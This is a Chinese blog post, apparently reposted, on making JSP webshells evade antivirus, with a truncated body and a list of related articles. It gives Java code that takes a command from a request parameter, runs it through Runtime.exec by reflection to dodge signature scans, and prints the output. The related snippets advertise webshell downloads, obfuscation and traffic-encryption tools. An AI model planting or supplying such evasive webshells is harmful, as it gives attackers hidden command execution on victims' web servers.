webshell之jsp免杀

最新推荐文章于 2025-06-24 16:46:20 发布
原创 最新推荐文章于 2025-06-24 16:46:20 发布 · 2.9k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #jsp #servlet #反射 #struts2

webshell之jsp免杀

转载自webshell免杀研究

原理

向服务器端发送恶意代码写成的文件(即:shell),客户端通过远程连接,利用shell连接到服务器,并可对服务器进行操作。

结构

实现三步

  1. 数据的传递
  2. 执行所传递的数据
  3. 回显

数据传递

String x = request.getParameter("x");

执行所传递的数据

Class rt = Class.forName("java.lang.Runtime");
Method gr = rt.getMethod("getRuntime");  //获取getRuntime方法
Method ex = rt.getMethod("exec", String.class);  //获取exec方法
Process e = (Process) ex.invoke(gr.invoke(null),  x);

回显

#in为执行返回结果
int a=-1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
    out.println(new String(b));
}
out.print("</pre>");

免杀思路

jsp类型webshell数据传入、回显两个部分都是很正常的代码,一般程序中都会使用,不会触发检测规则。

所以需要重点关注杀毒软件对执行这个部分的检测

免杀

将以上三个部分拼接出来就是正常的通过类反射执行

最低0.47元/天 解锁文章

200万优质内容无限畅学
tomyyyyy
关注
JSP Webshell
悦分享
08-01 1825
上面提到JSP在第一次运行的时候会先被Web容器,如Tomcat翻译成Java文件,然后才会被Jdk编译成为Class加载到jvm虚拟机中运行。JDK在编译的时候只看java文件的格式是否正确。而Tomcat在翻译JSP的不会检查其是否合乎语法。...
JSP webshell——webshell
weixin_46601374的博客
06-29 3929
好搞笑,我身边的人省护期间天天提到许少,听说是一个很厉害的大佬。结果我跟着学的视频就是这位大佬的。更离谱的是,聪哥说我们是见过许少的,就是上次给红队整理报告的时候,他就在。果然,实习就是好,传说中的大佬们就在身边——虽然我都不认识,但是还是感觉好厉害。来吧,开始学习首先就是最简单的一句话木: 太容易被发现了而且在我写代码的时候电脑的病毒和威胁防护就已经开始反应了现在将这一句话木,分开来写 沙箱是通过了✌但是cmd=ipconfig是什么都不出的,netstat -ano也是。 再次修改代码中间
Webshell-JSP
qq_55787787的博客
10-15 3548
JSP的基本方式。
WEB安全--Java安全--jsp webshell
最新发布
m0_74800552的博客
06-24 364
介绍部分jsp webshell的原理
认识JSP webshell
xlsj雪松的博客
08-19 1538
Tomcat运行这就是一个典型的webshell,但这个webshell的各种特征已经被安全检测平台记录,很容易识别出来。【D盾】【shellpub】接下来进行就是将这些被识别的特征进行替换,绕过,混淆和干扰。
JSP webshell——JSP的基础
weixin_46601374的博客
06-29 2022
唉,每次开启JSP都要好一会儿。话说我也不知道为啥,我的每次开启条件一次比一次苛刻。一开始必应就可以打开,再后来只能由谷歌打开,现在可好了得开着代理用谷歌才能进去。在标记符号之间声明变量,定义方法以及定义类。 标记符号的内容习惯上放在JSP 页面指令之后,之前,也可以写在与之间。之间声明的变量在整个JSP页面内都有效,与标记符在JSP页面中所在的书写位置无关,但习惯上把 标记符写在JSP页面的前面。●一个JSP页面可以...
华夏webshell
08-13
webshell webshell webshell webshell
PHP webshell技术实践与探索.pdf
01-05
首先,我们将介绍 Webshell 的概念和基本特征,然后讨论传统的 Webshell 技术的缺陷,并提出基于语法逻辑、运算逻辑、生僻回调、静态特征隐藏等方法的技术。最后,我们将总结出一套适用于当代 Webshell ...
JSP-Webshells全套汇总
09-29
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
webshell.jsp
12-30
webshell.jsp JSP shell
webshell项目-Auto-JSPwebshell(五)
SuperherRo的博客
08-09 202
Auto-JSPwebshell/jsp/webshell/自动生成
JSPwebshell
08-21
忍痛分享啊。
最新webshell
07-21
webshell 过世界软。带防删功能。提权加强版。
小七专用webshell
04-25
小七专用webshell,性能好。稳定性强
webshell -真实可用的jsp
03-30
网上很多一句话、webshell 各种原因导致不能用,亲测可用的大,忍痛割爱与大家分享
jsp webshell JspSpy.jsp
04-19
jsp webshell jspspy 修复部分操作系统下乱码问题。
过d盾 jsp webshell+冰蝎探讨
goddemon
07-19 3174
jsp的思路其实一般最常用的就是反射和类加载问题+反转问题就能bypasswebshell的查了当然现在的有些厂商直接强标识这种就要el去绕咯。
jsp写的webshell
wahahams123的专栏
10-28 5862
/** WEBSHELL.JSP** Author: lovehacker* E-mail: [email protected]** 使用方法: * ]http://victim/webshell.jsp?[options]* options:* action=piped&remoteHost=&remotePort=&myIp=&myPort=* action=tunnel&remot
Webshell工具(附加:流量混淆)
Fly_鹏程万里
05-28 1070
XGNTAI用于实现Webshell、流量加密传输,生成冰蝎、哥斯拉等Webshell的PHP、JSP文件,生成冰蝎流量加密传输配置文件。
提升webshell稳定性的开源源码分析
而“源码webshell”指的是这类webshell的源代码是经过精心设计的,目的就是为了规避安全软件的检测和防御机制,即实现所谓的“”功能。 webshell技术涉及到多个层面,包括但不限于代码混淆、加密...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值